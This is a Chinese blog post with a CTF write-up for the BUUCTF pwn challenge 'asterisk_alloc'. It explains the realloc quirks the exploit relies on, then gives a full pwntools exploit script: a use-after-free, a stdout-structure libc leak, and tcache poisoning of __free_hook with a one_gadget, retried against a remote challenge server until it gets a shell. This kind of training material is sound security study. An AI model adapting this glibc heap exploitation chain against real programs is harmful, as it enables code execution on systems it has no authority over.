(BUUCTF)TWCTF_online_2019_asterisk_alloc

最新推荐文章于 2024-07-07 17:22:02 发布
最新推荐文章于 2024-07-07 17:22:02 发布
阅读量402 收藏 8
点赞数 8
分类专栏: pwn_writeup 文章标签: 安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy1458214551/article/details/135225708
版权

文章目录

前置知识

  • realloc函数的利用
  • 利用unsortedbin中残留的指针进行partial overwrite,来劫持_IO_2_1_stdout
  • 通过_IO_2_1_stdout进行输出

整体思路

realloc函数

realloc(ptr, new_size);
// realloc函数可以重新调整之前分配的内存块的大小。
// 若ptr为0且new_size > 0,则相当于malloc(new_size)
// 若new_size为0,则会将ptr进行free
// 若new_size非法,则会return NULL
// 若new_size < old_size - 0x20,则会chunk shrink,多余的部分会直接free
// 若new_size > old_size,高地址处的chunk为top chunk则直接扩展;高地址处为free状态的chunk,则需要后面free的chunk合并,判断切割后能否满足,否则直接申请新的chunk,复制到新的chunk中,将以前的chunk进行free

思路

观察程序,发现可以通过malloc/calloc/realloc申请内存,同时delete中存在uaf。此外,malloccalloc都只可以进行一次,而realloc可以一直进行。但realloc申请的内存的指针会放到bss段一个固定地址,无法通过realloc实现多次malloc。但是,可以通过realloc一个非法地址,从而使其返回NULL,覆盖掉bss段的固定地址,使其为NULL。如此一来再次执行realloc时,第一个参数将为NULL,相当于可以无数次malloc了。

有了无数次malloc,便可以通过多次释放同一个chunk填满tcacheunsortedbin,然后操纵unsortedbin中残留的libc地址来通过_IO_2_1_stdout泄露libc地址。

这之后就只需要通过double freetcache poisoning就好了。

exp

from pwn import *
from LibcSearcher import *

filename = './TWCTF_online_2019_asterisk_alloc'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.27-3ubuntu1_amd64/libc.so.6')

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

def malloc(size, content):
    sh.sendlineafter('Your choice: ', '1')
    sh.sendlineafter('Size: ', str(size))
    sh.sendafter('Data: ', content)

def calloc(size, content):
    sh.sendlineafter('Your choice: ', '2')
    sh.sendlineafter('Size: ', str(size))
    sh.sendafter('Data: ', content)

def realloc(size, content):
    sh.sendlineafter('Your choice: ', '3')
    sh.sendlineafter('Size: ', str(size))
    sh.sendafter('Data: ', content)

def realloc_null(size):
    sh.sendlineafter('Your choice: ', '3')
    sh.sendlineafter('Size: ', str(size))

def delete(type):
    sh.sendlineafter('Your choice: ', '4')
    sh.sendlineafter('Which: ', type)

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)

def exp(sh):
    # 申请一个大小为0x100的chunk
    malloc(size=0xf0, content='a')
    
    # 再申请一个大小为0x100的chunk,防止上一个在挂入unsortedbin的时候被top合并
    realloc(size=0xf0, content='prevent_mergeing')

    # 利用uaf连续free 8次,使得一个chunk被挂入unsortedbin
    for i in range(8):
        delete('m')

    # 当输入值为-1的时候,由于输入不合法,会返回NULL,覆盖掉程序中realloc的指针。
    realloc_null(size=-1)
    # 由此,可以通过realloc重新申请chunk。这里两步通过unsortedbin中残留的libc地址,来partial overwrite其为_IO_2_1_stdout的地址,概率为1/16
    realloc(size=0xd0, content='\x60\x87')
    
    # 同理,先输入-1来清空指针,便可再次realloc申请不同的chunk
    realloc_null(size=-1)
    realloc(size=0xf0, content='aaa')

    # 修改_IO_2_1_stdout,覆盖_IO_write_base的最低位为0,便可泄露出一些地址
    realloc_null(size=-1)
    payload = p64(0xfbad1887)
    payload = payload.ljust(0x20, b'\x00') + p8(0)
    realloc(size=0xf0, content=payload)
    libc_leak = u64(sh.recv(16)[8:])
    libc.address = libc_leak - 0x3ed8b0
    leak_info('libc.address', libc.address)


    # 接下来打free_hook即可
    realloc_null(size=-1)
    realloc(size=0x60, content='aa')
    delete('r')
    delete('r')

    realloc_null(size=-1)
    one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]
    payload = p64(libc.sym['__free_hook'])
    realloc(size=0x60, content=payload)

    realloc_null(size=-1)
    realloc(size=0x60, content='aa')
    
    realloc_null(size=-1)
    payload = p64(libc.address + one_gadget[1])
    realloc(size=0x60, content=payload)
    delete('r')
    sh.interactive()

while True:
    if local:
        sh = process(filename)
    else:
        sh = remote('node4.buuoj.cn', 26650)
    
    try:
        exp(sh)
    except:
        sh.close()
        continue
LtfallQwQ
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF-PWN刷题记录-11
weixin_44145820的博客
04-22 833
目录wustctf2020_name_your_cat wustctf2020_name_your_cat
sip.zip_asterisk_sip ppt
09-19
**SIP协议与Asterisk:构建VoIP通信的核心技术** SIP(Session Initiation Protocol)协议是一种用于控制多媒体通信会话(如语音和视频通话)的信令协议。它在互联网电话(VoIP)领域扮演着核心角色,使得用户可以...
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结
seaaseesa的博客
04-17 1022
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结 有些情况下,仅有malloc/calloc/realloc和free两种功能,并且可以实现任意地址分配,如果想要达到利用,还需要知道地址,在glibc下,一般就是攻击_IO_2_1_stdout_结构体来实现信息泄露,通过低字节覆盖unsorted bin留下的main...
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 453
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
Asterisk chan_dahdi 使用过程
我的学习笔记
06-06 2000
不同于chan_sip,chan_dahdi 的使用需要硬件的支持。 使用步骤如下: 安装/加载 dahdi驱动 执行dahdi_cfg (需要安装dahdi_tools,并依赖于/etc/dahdi/system.conf 文件) 修改chan_dahdi.conf 编写dialplan 重启asterisk 1.安装/加载 dahdi驱动 modprobe my_wctdm.ko ...
Asterisk chan_alsa 使用方法
我的学习笔记
03-06 928
在Asterisk 中,通常打电话都是建立在通道与通道之间,pbx 只是中转作用,那pbx 有没有办法直接与分机通话呢?有的,那就是使用chan_alsa 。 要求pbx 板子有麦克风和耳机接口,并且安装了alsa声卡驱动,alsa 是 linux 系统下的声卡驱动框架,也叫asoc。 如何使用? 加载chan_alsa.so 按需修改 /etc/asterisk/alsa.conf (一般使用...
openwrt 编译 asterisk 添加 chan_alsa.so
我的学习笔记
03-19 917
子选项里是没有chan_alsa 配置项的。 如何添加? 需要修改 feeds/telephony/net/asterisk-x/Makefile文件 1. DEPENDS 添加 DEPENDS:= ...+alsa-lib ... 2. define Package/asterisk18/conffiles 添加 /etc/asterisk/alsa.conf 3. AST_EMB_MODULES AST_EMB_MODULES:= ... chan_alsa 4. CONFIGURE_ARGS+
asterisk extension calls between res_pjsip and chan_sip
Yin_Zhenwen的博客
09-08 977
configure and teste calls between res_pjsip and chan_sip extensions at the following scenario: 1) dial from extensions 2) dial to queue 3) dial from cli command 4) dial from manager command 5) dial into meetme room
pbx.rar_asterisk_pbx spo_pbx 源码
09-19
Asterisk是一款开源的IP电话系统,用于构建VoIP网络通信平台。PBX(Private Branch Exchange)是Asterisk中的核心组件,它负责管理和路由电话呼叫。"pbx.rar_asterisk_pbx spo_pbx 源码" 提供的是与Asterisk PBX相关...
chan_dahdi.rar_asterisk_asterisk channel_asterisk中cid_channel as
09-24
Dahdi是Digital Access and High-speed Digital Subscriber Line Interface的缩写,它是Asterisk与传统电话线路交互的驱动层,允许Asterisk处理来自T1/E1线路的语音和数据通信。 Dahdi通道在Asterisk中扮演着核心...
asterisk_mastering_file1.rar_Mastering Linux
09-21
【标题】"asterisk_mastering_file1.rar_Mastering Linux" 提供的是关于精通Linux环境下的Asterisk PBX平台的深度学习资源。Asterisk是一款开源的电话互换软件,常用于构建VoIP(Voice over Internet Protocol)系统...
Simple.SIP.TSipClient.v2.9.zip_V2 _asterisk_delphi asterisk_sip_
07-14
COMPONENTE DE DELPHI PARA LLAMADAS EN ASTERISK POR EL PUERTO SIP ES NECESARIO HACER LA INTALACION CORRESPONDIENTE Y CARGAR LA RUTA DEL ARCHIVO FUENTE.
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 528
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
绝区肆--2024 年AI安全状况
最新发布
RamendeusStudio的博客
07-07 364
随着人工智能系统变得越来越强大和普及,与之相关的安全问题也越来越多。让我们来看看 2024 年人工智能安全的现状——评估威胁、分析漏洞、审查有前景的防御策略,并推测这一关键领域的未来可能如何。
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 259
亚信安全发布2024年6月威胁态势
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 331
IDF版本:4.4.7。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1096
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 827
然后这一步,你看,这里有个决策点
asterisk chan_mobile
11-22
asterisk chan_mobile是Asterisk通信平台中的一个通道驱动模块,用于实现移动通信设备和Asterisk之间的连接和通信。 asterisk chan_mobile提供了与GSM移动设备(如手机或GSM网关)进行通信的能力。通过该模块,Asterisk系统可以通过无线GSM网络拨打和接听电话,实现与移动通信终端的连接。 使用asterisk chan_mobile,可以将GSM通信功能整合到Asterisk通信平台中,从而实现一些特殊的通信需求。例如,可以通过chan_mobile模块将一台移动电话设备作为Asterisk系统的一个外线通道来使用,将其用于呼叫转接、呼叫路由等功能。同时,也可以利用该模块进行短信的收发、语音录制和播放等操作。 为了能够使用asterisk chan_mobile模块,需要先在Asterisk系统上安装相应的软件和配置文件。然后,通过配置Asterisk的通道文件,设定GSM设备的通信参数和连接方式。在配置完毕后,Asterisk系统即可通过chan_mobile模块与GSM设备进行通信。 总之,asterisk chan_mobile模块为Asterisk通信平台提供了与GSM移动设备的无线通信能力,可以实现移动电话设备与Asterisk系统的连接和通信,为用户提供更加灵活和多样化的通信方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值